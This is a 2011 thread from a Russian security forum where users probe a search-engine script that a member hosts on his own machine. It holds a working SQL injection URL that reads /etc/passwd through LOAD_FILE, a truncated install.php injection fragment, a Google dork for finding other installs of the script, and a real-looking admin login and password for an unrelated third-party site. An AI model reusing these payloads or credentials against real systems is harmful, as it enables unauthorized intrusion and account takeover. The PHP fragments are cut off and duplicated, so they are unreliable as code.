ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
18.10.2011, 18:16
|
|
Новичок
Регистрация: 13.10.2011
Сообщений: 12
Провел на форуме:
2525
Репутация:
0
|
|
|
|
|
18.10.2011, 19:25
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 117
Провел на форуме:
795261
Репутация:
28
|
|
По ссылке даже не переходил, но уже одно то, что сайт на фришном домене, дает как минимум 50%, что это какая-то хренатень.
|
|
|
|
18.10.2011, 19:40
|
|
Познающий
Регистрация: 21.08.2010
Сообщений: 97
Провел на форуме:
22649
Репутация:
0
|
|
А там написано скрипт поисковой ситемы) причем тут CMS
|
|
|
|
18.10.2011, 19:47
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме:
40748
Репутация:
78
|
|
Oops..
Need: magic_quotes =Off
install.php
[PHP]
[COLOR="#000000"][...]
if(isset($_POST['go_ed'])) {
if (!is_writable("settings/database.php")) {
print "Файла database.php несуществует или незаданы права доступа 666";
} else {
$fhandle=fopen("settings/database.php","w");
fwrite($fhandle,"[COLOR="#0000BB"]
|
|
|
|
18.10.2011, 21:34
|
|
Участник форума
Регистрация: 05.09.2010
Сообщений: 147
Провел на форуме:
40748
Репутация:
78
|
|
http://23rus.sytes.net/static.php?str='+and+1=2+union+select+1,2,concat_w s(0x3a,version(),user(),database()),LOAD_FILE('/etc/passwd')+--+
Сноси в общем.
Код писала курица.
p.s. не юзай юзера root. у него FILE_PRIV как минимум включен, и имеет он доступ ко всем базам данных.
|
|
|
|
18.10.2011, 21:53
|
|
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125
Репутация:
3
|
|
Сообщение от Boolean
http://23rus.sytes.net/static.php?str='+and+1=2+union+select+1,2,concat_w s(0x3a,version(),user(),database()),LOAD_FILE('/etc/passwd')+--+
Сноси в общем.
Код писала курица.
p.s. не юзай юзера root. у него FILE_PRIV как минимум включен, и имеет он доступ ко всем базам данных.
на многих сайтах логин/пароль - moders
админка - /admin/
Google Dork:"Created by Kiria-Studio"
http://search.afu-time.com/admin/index.php - sorokin96:25101996 (не тот ли это кирил - разработчик? )
|
|
|
|
19.10.2011, 01:49
|
|
Новичок
Регистрация: 13.10.2011
Сообщений: 12
Провел на форуме:
2525
Репутация:
0
|
|
Сообщение от Exandr
А там написано скрипт поисковой ситемы) причем тут CMS
да эт я чуток попутал
|
|
|
|
19.10.2011, 01:51
|
|
Новичок
Регистрация: 13.10.2011
Сообщений: 12
Провел на форуме:
2525
Репутация:
0
|
|
[QUOTE="Boolean"]
Oops..
Need: magic_quotes =Off
install.php
[PHP]
[COLOR="#000000"][...]
if(isset($_POST['go_ed'])) {
if (!is_writable("settings/database.php")) {
print "Файла database.php несуществует или незаданы права доступа 666";
} else {
$fhandle=fopen("settings/database.php","w");
fwrite($fhandle,"[COLOR="#0000BB"]Файла database.php несуществует или незаданы права досту па 666";
} else {
$fhandle=fopen("settings/database.php","w");
fwrite($fhandle,"[COLOR="#0000BB"]
|
|
|
|
19.10.2011, 01:55
|
|
Новичок
Регистрация: 13.10.2011
Сообщений: 12
Провел на форуме:
2525
Репутация:
0
|
|
Сообщение от HIMIKAT
По ссылке даже не переходил, но уже одно то, что сайт на фришном домене, дает как минимум 50%, что это какая-то хренатень.
ясен хрен он фришный я же на своем компе сайт повесил
|
|
|
|
10.11.2011, 22:56
|
|
Познающий
Регистрация: 10.11.2011
Сообщений: 44
Провел на форуме:
13173
Репутация:
0
|
|
всмысле на своем компе? на сервере?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
